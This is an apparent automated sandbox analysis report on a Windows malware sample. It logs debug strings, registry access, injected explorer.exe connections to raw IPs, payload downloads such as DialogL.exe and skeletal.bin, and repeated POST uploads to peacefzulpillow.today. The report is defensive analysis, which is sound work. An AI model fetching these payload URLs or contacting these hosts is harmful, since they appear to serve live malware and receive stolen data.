                  Source: Binary string: D:\DynamicLinkMediaServer8\releases\2014.03\shared\third_party\projects\boost_system\lib\win\release\32\boost_system.pdb source: Server.exe, 0000000C.00000002.2382831511.0000000000624000.00000002.00000001.01000000.0000000A.sdmp, Server.exe, 0000000F.00000002.2449859124.0000000000514000.00000002.00000001.01000000.0000000A.sdmp
                  Source: Binary string: D:\DynamicLinkMediaServer8\releases\2014.03\dynamiclinkmediaserver\Targets\Win\Release\64\32\Memory.pdbl` source: Server.exe, 0000000C.00000002.2392305204.0000000001E34000.00000002.00000001.01000000.0000001B.sdmp, Server.exe, 0000000F.00000002.2456559187.0000000001E34000.00000002.00000001.01000000.0000001B.sdmp
                  Source: Binary string: D:\DynamicLinkMediaServer8\releases\2014.03\shared\third_party\projects\boost_system\lib\win\release\32\boost_system.pdbPb source: Server.exe, 0000000C.00000002.2382831511.0000000000624000.00000002.00000001.01000000.0000000A.sdmp
                  Source: Binary string: D:\DynamicLinkMediaServer8\releases\2014.03\shared\adobe\dvamediatypes\lib\win\release\32\dvamediatypes.pdbph(zg source: Server.exe, 0000000C.00000002.2383286120.0000000000674000.00000002.00000001.01000000.0000000C.sdmp
                  Source: Binary string: D:\DynamicLinkMediaServer8\releases\2014.03\dynamiclinkmediaserver\Targets\Win\Release\64\32\Adobe QT32 Server.pdb source: Server.exe, 0000000C.00000002.2382705300.00000000004BB000.00000002.00000001.01000000.00000009.sdmp, Server.exe, 0000000C.00000000.2328182678.00000000004BB000.00000002.00000001.01000000.00000009.sdmp, Server.exe, 0000000F.00000002.2449639002.00000000004BB000.00000002.00000001.01000000.00000009.sdmp, Server.exe, 0000000F.00000000.2399740812.00000000004BB000.00000002.00000001.01000000.00000009.sdmp
                  Source: Binary string: D:\DynamicLinkMediaServer8\releases\2014.03\shared\adobe\dvatransport\lib\win\release\32\dvatransport.pdb source: Server.exe, 0000000C.00000002.2383495933.0000000000824000.00000002.00000001.01000000.0000000D.sdmp, Server.exe, 0000000F.00000002.2450849542.0000000000BA4000.00000002.00000001.01000000.0000000D.sdmp, Server.exe, 0000000F.00000003.2420274218.0000000000686000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: E:\bslave-ngproducts\builddir\build\mc_adobe_sdk_dbginfo_win32_ia32_release\mc_enc_dv.pdbP6 source: Server.exe, 0000000C.00000002.2398936453.000000006CE89000.00000002.00000001.01000000.00000018.sdmp, Server.exe, 0000000F.00000002.2464131766.0000000070149000.00000002.00000001.01000000.00000018.sdmp
                  Source: C:\Windows\SysWOW64\more.com; Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}
                  Source: C:\Windows\SysWOW64\more.com; Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAs
                  Source: C:\Windows\SysWOW64\more.com; Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32
                  Source: C:\Windows\SysWOW64\more.com; Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler32
                  Source: C:\Windows\SysWOW64\more.com; Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler
                  Source: C:\Windows\SysWOW64\more.com; Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}
                  Source: C:\Windows\SysWOW64\more.com; Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAs
                  Source: C:\Windows\SysWOW64\more.com; Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32
                  Source: C:\Windows\SysWOW64\more.com; Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler32
                  Source: C:\Windows\SysWOW64\more.com; Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler
                  Source: C:\Windows\SysWOW64\more.com; Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\LocalServer32
                  Source: C:\Windows\SysWOW64\more.com; Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\LocalServer
                  Source: C:\Windows\SysWOW64\more.com; Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}
                  Source: C:\Windows\SysWOW64\more.com; Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\Elevation
                  Source: C:\Windows\SysWOW64\more.com; Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}
                  Source: C:\Windows\SysWOW64\more.com; Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAs
                  Source: C:\Users\user\AppData\Local\Temp\HL047ZZ4FG3J96B30TQFR3DUZDL9\Server.exe; Code function: 15_2_009D44A0 ??2@YAPAXI@Z,GetLogicalDriveStringsW,GetDriveTypeW,?assign@?$basic_string@GU?$char_traits@G@std@@V?$STLAllocator@G@SmallBlockAllocator@utility@dvacore@@@std@@QAEAAV12@ABV12@II@Z,?append@?$basic_string@GU?$char_traits@G@std@@V?$STLAllocator@G@SmallBlockAllocator@utility@dvacore@@@std@@QAEAAV12@PBGI@Z,?Dispose@SmallBlockAllocator@utility@dvacore@@YAXPAXI@Z,?Dispose@SmallBlockAllocator@utility@dvacore@@YAXPAXI@Z,15_2_009D44A0

                  Networking

                  Source: C:\Windows\SysWOW64\explorer.exe; Network Connect: 62.60.234.80 1466
                  Source: C:\Windows\SysWOW64\explorer.exe; Network Connect: 15.197.198.189 8545
                  Source: C:\Windows\SysWOW64\explorer.exe; Network Connect: 3.161.82.59 80
                  Source: global traffic; TCP traffic: 185.21.13.144 ports 27435,0,2,27085,5,7,8
                  Source: global traffic; TCP traffic: 192.168.2.4:49733 -> 77.238.237.190:12113
                  Source: global traffic; TCP traffic: 192.168.2.4:49734 -> 15.197.198.189:8545
                  Source: global traffic; TCP traffic: 192.168.2.4:49737 -> 62.60.234.80:1466
                  Source: global traffic; TCP traffic: 192.168.2.4:49746 -> 185.21.13.144:27085
                  Source: global traffic; HTTP traffic detected: GET /temp/DialogL.exe HTTP/1.1Connection: Keep-AliveHost: www.suarakutim.com
                  Source: global traffic; HTTP traffic detected: GET /file_premium/tgt65hk2h8vsbrn/skeletal.bin/file HTTP/1.1Connection: Keep-AliveHost: www.mediafire.com
                  Source: global traffic; HTTP traffic detected: GET /2286;8aak5qqtt4pgkhxjqG-hwmgKPucfnwaQD9mlEAws51nokTzIwYnw40rg7_sZ7wmnZvpNXDxIjDHYnGjUnzSw1al_AqfnW1WfDfoFHUrZOfxQjOZ6avzOuDi8MAqC2xtRl6t7S9eEpZv1D6Z3Z5m-Sl1s44ShFoY38F2AMeLZYOOEPTvAXOEOnMZfAaFW3Om14U9A/tgt65hk2h8vsbrn/skeletal.bin HTTP/1.1Connection: Keep-AliveHost: ultra.mediafirecdn.com
                  Source: Joe Sandbox View; IP Address: 62.60.234.80
                  Source: Joe Sandbox View; ASN Name: ASLINE-AS-APASLINELIMITEDHK
                  Source: Joe Sandbox View; ASN Name: TANDEMUS
                  Source: Joe Sandbox View; JA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
                  Source: Network traffic; Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49724 -> 104.21.72.2:443
                  Source: Network traffic; Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49721 -> 104.21.72.2:443
                  Source: Network traffic; Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49723 -> 104.21.72.2:443
                  Source: Network traffic; Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49725 -> 104.21.72.2:443
                  Source: Network traffic; Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49726 -> 104.21.72.2:443
                  Source: Network traffic; Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49728 -> 104.21.72.2:443
                  Source: Network traffic; Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49727 -> 104.21.72.2:443
                  Source: Network traffic; Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49729 -> 191.101.230.18:443
                  Source: Network traffic; Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49730 -> 104.17.151.117:443
                  Source: Network traffic; Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49731 -> 104.18.36.145:443
                  Source: global traffic; HTTP traffic detected: POST /Kdzw HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 57Host: peacefzulpillow.today
                  Source: global traffic; HTTP traffic detected: POST /Kdzw HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=Z0RypXGD87User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 19587Host: peacefzulpillow.today
                  Source: global traffic; HTTP traffic detected: POST /Kdzw HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=zOWFu04pqA92User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8754Host: peacefzulpillow.today
                  Source: global traffic; HTTP traffic detected: POST /Kdzw HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=A97veik84F30DFLM4User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 20432Host: peacefzulpillow.today
                  Source: global traffic; HTTP traffic detected: POST /Kdzw HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=NMjdjlkBp9WronoUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 2394Host: peacefzulpillow.today
                  Source: global traffic; HTTP traffic detected: POST /Kdzw HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=qN2UCTdwNUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 585992Host: peacefzulpillow.today
                  Source: global traffic; HTTP traffic detected: POST /Kdzw HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 95Host: peacefzulpillow.today
                  Source: unknown; TCP traffic detected without corresponding DNS query: 46.8.232.106
                  Source: unknown; TCP traffic detected without corresponding DNS query: 46.8.232.106
                  Source: unknown; TCP traffic detected without corresponding DNS query: 46.8.232.106
                  Source: unknown; TCP traffic detected without corresponding DNS query: 46.8.232.106
                  Source: unknown; TCP traffic detected without corresponding DNS query: 46.8.232.106
                  Source: unknown; TCP traffic detected without corresponding DNS query: 46.8.232.106
                  Source: unknown; TCP traffic detected without corresponding DNS query: 46.8.232.106
                  Source: unknown; TCP traffic detected without corresponding DNS query: 46.8.232.106
                  Source: unknown; TCP traffic detected without corresponding DNS query: 46.8.232.106
                  Source: unknown; TCP traffic detected without corresponding DNS query: 46.8.232.106
                  Source: unknown; TCP traffic detected without corresponding DNS query: 46.8.232.106
                  Source: unknown; TCP traffic detected without corresponding DNS query: 46.8.232.106
                  Source: unknown; TCP traffic detected without corresponding DNS query: 77.238.237.190
                  Source: unknown; TCP traffic detected without corresponding DNS query: 77.238.237.190
                  Source: unknown; TCP traffic detected without corresponding DNS query: 77.238.237.190
                  Source: unknown; TCP traffic detected without corresponding DNS query: 77.238.237.190
                  Source: unknown; TCP traffic detected without corresponding DNS query: 77.238.237.190
                  Source: unknown; TCP traffic detected without corresponding DNS query: 77.238.237.190
                  Source: unknown; TCP traffic detected without corresponding DNS query: 77.238.237.190
                  Source: unknown; TCP traffic detected without corresponding DNS query: 62.60.234.80
                  Source: unknown; TCP traffic detected without corresponding DNS query: 62.60.234.80
                  Source: unknown; TCP traffic detected without corresponding DNS query: 62.60.234.80
                  Source: unknown; TCP traffic detected without corresponding DNS query: 62.60.234.80
                  Source: unknown; TCP traffic detected without corresponding DNS query: 62.60.234.80
                  Source: unknown; TCP traffic detected without corresponding DNS query: 77.238.237.190
                  Source: unknown; TCP traffic detected without corresponding DNS query: 77.238.237.190
                  Source: unknown; TCP traffic detected without corresponding DNS query: 77.238.237.190
                  Source: unknown; TCP traffic detected without corresponding DNS query: 77.238.237.190
                  Source: unknown; TCP traffic detected without corresponding DNS query: 46.8.232.106
                  Source: unknown; TCP traffic detected without corresponding DNS query: 46.8.232.106
                  Source: unknown; TCP traffic detected without corresponding DNS query: 46.8.232.106
                  Source: unknown; TCP traffic detected without corresponding DNS query: 46.8.232.106
                  Source: unknown; TCP traffic detected without corresponding DNS query: 46.8.232.106
                  Source: unknown; TCP traffic detected without corresponding DNS query: 46.8.232.106
                  Source: unknown; TCP traffic detected without corresponding DNS query: 46.8.232.106
                  Source: unknown; TCP traffic detected without corresponding DNS query: 46.8.232.106
                  Source: unknown; TCP traffic detected without corresponding DNS query: 46.8.232.106
                  Source: unknown; TCP traffic detected without corresponding DNS query: 46.8.232.106
                  Source: unknown; TCP traffic detected without corresponding DNS query: 46.8.232.106
                  Source: unknown; TCP traffic detected without corresponding DNS query: 147.45.196.157
                  Source: unknown; TCP traffic detected without corresponding DNS query: 147.45.196.157
                  Source: unknown; TCP traffic detected without corresponding DNS query: 147.45.196.157
                  Source: unknown; TCP traffic detected without corresponding DNS query: 77.238.237.190
                  Source: unknown; TCP traffic detected without corresponding DNS query: 147.45.196.157
                  Source: unknown; TCP traffic detected without corresponding DNS query: 147.45.196.157
                  Source: unknown; TCP traffic detected without corresponding DNS query: 147.45.196.157
                  Source: unknown; TCP traffic detected without corresponding DNS query: 147.45.196.157
                  Source: unknown; TCP traffic detected without corresponding DNS query: 147.45.196.157
                  Source: unknown; TCP traffic detected without corresponding DNS query: 147.45.196.157
                  Source: unknown; TCP traffic detected without corresponding DNS query: 147.45.196.157
                  Source: C:\Users\user\AppData\Local\Temp\HL047ZZ4FG3J96B30TQFR3DUZDL9\Server.exe; Code function: 12_2_007F4040 ?system_category@system@boost@@YAABVerror_category@12@XZ,?system_category@system@boost@@YAABVerror_category@12@XZ,WSASetLastError,WSARecv,?system_category@system@boost@@YAABVerror_category@12@XZ,WSAGetLastError,?system_category@system@boost@@YAABVerror_category@12@XZ,?system_category@system@boost@@YAABVerror_category@12@XZ,12_2_007F4040
                  Source: global traffic; HTTP traffic detected: GET /temp/DialogL.exe HTTP/1.1Connection: Keep-AliveHost: www.suarakutim.com
                  Source: global traffic; HTTP traffic detected: GET /file_premium/tgt65hk2h8vsbrn/skeletal.bin/file HTTP/1.1Connection: Keep-AliveHost: www.mediafire.com
                  Source: global traffic; HTTP traffic detected: GET /2286;8aak5qqtt4pgkhxjqG-hwmgKPucfnwaQD9mlEAws51nokTzIwYnw40rg7_sZ7wmnZvpNXDxIjDHYnGjUnzSw1al_AqfnW1WfDfoFHUrZOfxQjOZ6avzOuDi8MAqC2xtRl6t7S9eEpZv1D6Z3Z5m-Sl1s44ShFoY38F2AMeLZYOOEPTvAXOEOnMZfAaFW3Om14U9A/tgt65hk2h8vsbrn/skeletal.bin HTTP/1.1Connection: Keep-AliveHost: ultra.mediafirecdn.com
                  Source: global traffic; HTTP traffic detected: GET /x.cer HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Microsoft-CryptoAPI/10.0Host: x.ss2.us
                  Source: global traffic; DNS traffic detected: DNS query: peacefzulpillow.today
                  Source: global traffic; DNS traffic detected: DNS query: www.suarakutim.com
                  Source: global traffic; DNS traffic detected: DNS query: www.mediafire.com
                  Source: global traffic; DNS traffic detected: DNS query: ultra.mediafirecdn.com
                  Source: global traffic; DNS traffic detected: DNS query: data-seed-prebsc-1-s1.binance.org
                  Source: global traffic; DNS traffic detected: DNS query: x.ss2.us
                  Source: unknown; HTTP traffic detected: POST /Kdzw HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 57Host: peacefzulpillow.today
                  Source: explorer.exe, 00000012.00000003.2509327264.000000000336C000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.2508670934.0000000026788000.00000004.00000001.00020000.00000000.sdmp; String found in binary or memory: http://acraiz.icpbrasil.gov.br/DPCacraiz.pdf0?
                  Source: explorer.exe, 00000012.00000003.2509327264.000000000336C000.00000004.00000020.00020000.00000000.sdmp; String found in binary or memory: http://acraiz.icpbrasil.gov.br/LCRacraizv2.crl0
                  Source: explorer.exe, 00000012.00000003.2508670934.0000000026788000.00000004.00000001.00020000.00000000.sdmp; String found in binary or memory: http://acraiz.icpbrasil.gov.br/LCRacraizv5.crl0
                  Source: Set-up.exe, 00000001.00000003.1837971893.000000000425D000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0
                  Source: Set-up.exe, 00000001.00000003.1837971893.000000000425D000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0B
                  Source: Server.exe, 0000000C.00000003.2353968785.000000000C19E000.00000004.00000001.00020000.00000000.sdmp, Server.exe, 0000000C.00000003.2351521886.0000000001F30000.00000004.00000001.00020000.00000000.sdmp, Server.exe, 0000000F.00000003.2423690281.000000000C058000.00000004.00000001.00020000.00000000.sdmp, Server.exe, 0000000F.00000003.2421784555.000000000BFEF000.00000004.00000001.00020000.00000000.sdmp; String found in binary or memory: http://certificates.intel.com/repository/CRL/Intel%20External%20Basic%20Issuing%20CA%203A(1).crl0
                  Source: Server.exe, 0000000C.00000003.2353968785.000000000C19E000.00000004.00000001.00020000.00000000.sdmp, Server.exe, 0000000C.00000003.2351521886.0000000001F30000.00000004.00000001.00020000.00000000.sdmp, Server.exe, 0000000F.00000003.2423690281.000000000C058000.00000004.00000001.00020000.00000000.sdmp, Server.exe, 0000000F.00000003.2421784555.000000000BFEF000.00000004.00000001.00020000.00000000.sdmp; String found in binary or memory: http://certificates.intel.com/repository/CRL/Intel%20External%20Basic%20Policy%20CA.crl0
                  Source: Server.exe, 0000000C.00000003.2353968785.000000000C19E000.00000004.00000001.00020000.00000000.sdmp, Server.exe, 0000000C.00000003.2351521886.0000000001F30000.00000004.00000001.00020000.00000000.sdmp, Server.exe, 0000000F.00000003.2423690281.000000000C058000.00000004.00000001.00020000.00000000.sdmp, Server.exe, 0000000F.00000003.2421784555.000000000BFEF000.00000004.00000001.00020000.00000000.sdmp; String found in binary or memory: http://certificates.intel.com/repository/certificates/Intel%20External%20Basic%20Issuing%20CA%203A(1
                  Source: Server.exe, 0000000C.00000003.2353968785.000000000C19E000.00000004.00000001.00020000.00000000.sdmp, Server.exe, 0000000C.00000003.2351521886.0000000001F30000.00000004.00000001.00020000.00000000.sdmp, Server.exe, 0000000F.00000003.2423690281.000000000C058000.00000004.00000001.00020000.00000000.sdmp, Server.exe, 0000000F.00000003.2421784555.000000000BFEF000.00000004.00000001.00020000.00000000.sdmp; String found in binary or memory: http://certificates.intel.com/repository/certificates/Intel%20External%20Basic%20Policy%20CA.crt0
                  Source: explorer.exe, 00000012.00000003.2508670934.0000000026788000.00000004.00000001.00020000.00000000.sdmp; String found in binary or memory: http://certs.oati.net/repository/OATICA2.crl0
                  Source: explorer.exe, 00000012.00000003.2508670934.0000000026788000.00000004.00000001.00020000.00000000.sdmp; String found in binary or memory: http://certs.oati.net/repository/OATICA2.crt0
                  Source: explorer.exe, 00000012.00000003.2508670934.0000000026788000.00000004.00000001.00020000.00000000.sdmp; String found in binary or memory: http://certs.oaticerts.com/repository/OATICA2.crl
                  Source: explorer.exe, 00000012.00000003.2508670934.0000000026788000.00000004.00000001.00020000.00000000.sdmp; String found in binary or memory: http://certs.oaticerts.com/repository/OATICA2.crt08
                  Source: explorer.exe, 00000012.00000003.2508670934.0000000026788000.00000004.00000001.00020000.00000000.sdmp; String found in binary or memory: http://cps.siths.se/sithsrootcav1.html0
                  Source: explorer.exe, 00000012.00000003.2509532860.0000000026712000.00000004.00000001.00020000.00000000.sdmp; String found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
                  Source: explorer.exe, 00000012.00000003.2509327264.000000000336C000.00000004.00000020.00020000.00000000.sdmp; String found in binary or memory: http://crl.defence.gov.au/pki0
                  Source: Server.exe, 0000000C.00000003.2353968785.000000000C19E000.00000004.00000001.00020000.00000000.sdmp, Server.exe, 0000000C.00000003.2351521886.0000000001F30000.00000004.00000001.00020000.00000000.sdmp, Server.exe, 0000000F.00000003.2423690281.000000000C058000.00000004.00000001.00020000.00000000.sdmp, Server.exe, 0000000F.00000003.2421784555.000000000BFEF000.00000004.00000001.00020000.00000000.sdmp; String found in binary or memory: http://crl.geotrust.com/crls/secureca.crl0
                  Source: explorer.exe, 00000012.00000003.2509327264.000000000336C000.00000004.00000020.00020000.00000000.sdmp; String found in binary or memory: http://crl.postsignum.cz/crl/psrootqca4.crl02
                  Source: explorer.exe, 00000012.00000003.2509327264.000000000336C000.00000004.00000020.00020000.00000000.sdmp; String found in binary or memory: http://crl.postsignum.eu/crl/psrootqca4.crl0
                  Source: Set-up.exe, 00000001.00000003.1837971893.000000000425D000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: http://crl.rootca1.amazontrust.com/rootca1.crl0
                  Source: explorer.exe, 00000012.00000003.2508670934.0000000026788000.00000004.00000001.00020000.00000000.sdmp; String found in binary or memory: http://crl.securetrust.com/SGCA.crl0
                  Source: explorer.exe, 00000012.00000003.2509124770.0000000003384000.00000004.00000020.00020000.00000000.sdmp; String found in binary or memory: http://crl.securetrust.com/STCA.crl0
                  Source: explorer.exe, 00000012.00000003.2508747671.0000000026785000.00000004.00000001.00020000.00000000.sdmp; String found in binary or memory: http://crl.ssc.lt/root-a/cacrl.crl0
                  Source: explorer.exe, 00000012.00000003.2508670934.0000000026788000.00000004.00000001.00020000.00000000.sdmp; String found in binary or memory: http://crl.ssc.lt/root-b/cacrl.crl0
                  Source: explorer.exe, 00000012.00000003.2508413739.00000000267B1000.00000004.00000001.00020000.00000000.sdmp; String found in binary or memory: http://crl.ssc.lt/root-c/cacrl.crl0
                  Source: Server.exe, 0000000C.00000003.2353968785.000000000C19E000.00000004.00000001.00020000.00000000.sdmp, Server.exe, 0000000C.00000003.2348584788.000000000093D000.00000004.00000020.00020000.00000000.sdmp, Server.exe, 0000000C.00000003.2350090833.0000000001EDA000.00000004.00000001.00020000.00000000.sdmp, Server.exe, 0000000C.00000003.2348837134.0000000001ED4000.00000004.00000001.00020000.00000000.sdmp, Server.exe, 0000000C.00000003.2350838055.0000000001ED5000.00000004.00000001.00020000.00000000.sdmp, Server.exe, 0000000C.00000003.2351521886.0000000001F30000.00000004.00000001.00020000.00000000.sdmp, Server.exe, 0000000C.00000003.2348147019.000000000093D000.00000004.00000020.00020000.00000000.sdmp, Server.exe, 0000000C.00000003.2349686201.000000000093D000.00000004.00000020.00020000.00000000.sdmp, Server.exe, 0000000C.00000003.2348355650.000000000093D000.00000004.00000020.00020000.00000000.sdmp, Server.exe, 0000000C.00000003.2347818479.000000000093D000.00000004.00000020.00020000.00000000.sdmp, Server.exe, 0000000C.00000003.2353264127.000000000093C000.00000004.00000020.00020000.00000000.sdmp, Server.exe, 0000000F.00000003.2418905518.000000000BF98000.00000004.00000001.00020000.00000000.sdmp, Server.exe, 0000000F.00000003.2426408049.0000000000686000.00000004.00000020.00020000.00000000.sdmp, Server.exe, 0000000F.00000003.2423690281.000000000C058000.00000004.00000001.00020000.00000000.sdmp, Server.exe, 0000000F.00000003.2419793519.0000000000686000.00000004.00000020.00020000.00000000.sdmp, Server.exe, 0000000F.00000003.2421784555.000000000BFEF000.00000004.00000001.00020000.00000000.sdmp, Server.exe, 0000000F.00000003.2422657051.0000000000686000.00000004.00000020.00020000.00000000.sdmp, Server.exe, 0000000F.00000003.2421210603.000000000BF97000.00000004.00000001.00020000.00000000.sdmp, Server.exe, 0000000F.00000003.2420344626.000000000BF95000.00000004.00000001.00020000.00000000.sdmp, Server.exe, 0000000F.00000003.2418315122.0000000000686000.00000004.00000020.00020000.00000000.sdmp, Server.exe, 0000000F.00000003.2423093748.000000000068B000.00000004.00000020.00020000.00000000.sdmp; String found in binary or memory: http://crl.thawte.com/ThawteTimestampingCA.crl0
                  Source: explorer.exe, 00000012.00000003.2509327264.000000000336C000.00000004.00000020.00020000.00000000.sdmp; String found in binary or memory: http://crl1.comsign.co.il/crl/comsignglobalrootca.crl0
                  Source: explorer.exe, 00000012.00000003.2509327264.000000000336C000.00000004.00000020.00020000.00000000.sdmp; String found in binary or memory: http://crl2.postsignum.cz/crl/psrootqca4.crl01
                  Source: Set-up.exe, 00000001.00000003.1837971893.000000000425D000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl07
                  Source: Set-up.exe, 00000001.00000003.1837971893.000000000425D000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
                  Source: Set-up.exe, 00000001.00000003.1837971893.000000000425D000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl00
                  Source: Set-up.exe, 00000001.00000003.1837971893.000000000425D000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: http://crt.rootca1.amazontrust.com/rootca1.cer0?
                  Source: explorer.exe, 00000012.00000003.2506844012.000000000334C000.00000004.00000020.00020000.00000000.sdmp; String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en
                  Source: Server.exe, 0000000C.00000003.2348584788.000000000093D000.00000004.00000020.00020000.00000000.sdmp, Server.exe, 0000000C.00000003.2350090833.0000000001EDA000.00000004.00000001.00020000.00000000.sdmp, Server.exe, 0000000C.00000003.2348837134.0000000001ED4000.00000004.00000001.00020000.00000000.sdmp, Server.exe, 0000000C.00000003.2350838055.0000000001ED5000.00000004.00000001.00020000.00000000.sdmp, Server.exe, 0000000C.00000003.2348147019.000000000093D000.00000004.00000020.00020000.00000000.sdmp, Server.exe, 0000000C.00000003.2349686201.000000000093D000.00000004.00000020.00020000.00000000.sdmp, Server.exe, 0000000C.00000003.2348355650.000000000093D000.00000004.00000020.00020000.00000000.sdmp, Server.exe, 0000000C.00000003.2347818479.000000000093D000.00000004.00000020.00020000.00000000.sdmp, Server.exe, 0000000C.00000003.2353264127.000000000093C000.00000004.00000020.00020000.00000000.sdmp, Server.exe, 0000000F.00000003.2418905518.000000000BF98000.00000004.00000001.00020000.00000000.sdmp, Server.exe, 0000000F.00000003.2426408049.0000000000686000.00000004.00000020.00020000.00000000.sdmp, Server.exe, 0000000F.00000003.2419793519.0000000000686000.00000004.00000020.00020000.00000000.sdmp, Server.exe, 0000000F.00000003.2422657051.0000000000686000.00000004.00000020.00020000.00000000.sdmp, Server.exe, 0000000F.00000003.2421210603.000000000BF97000.00000004.00000001.00020000.00000000.sdmp, Server.exe, 0000000F.00000003.2420344626.000000000BF95000.00000004.00000001.00020000.00000000.sdmp, Server.exe, 0000000F.00000003.2418315122.0000000000686000.00000004.00000020.00020000.00000000.sdmp, Server.exe, 0000000F.00000003.2423093748.000000000068B000.00000004.00000020.00020000.00000000.sdmp, Server.exe, 0000000F.00000003.2420274218.0000000000686000.00000004.00000020.00020000.00000000.sdmp, Server.exe, 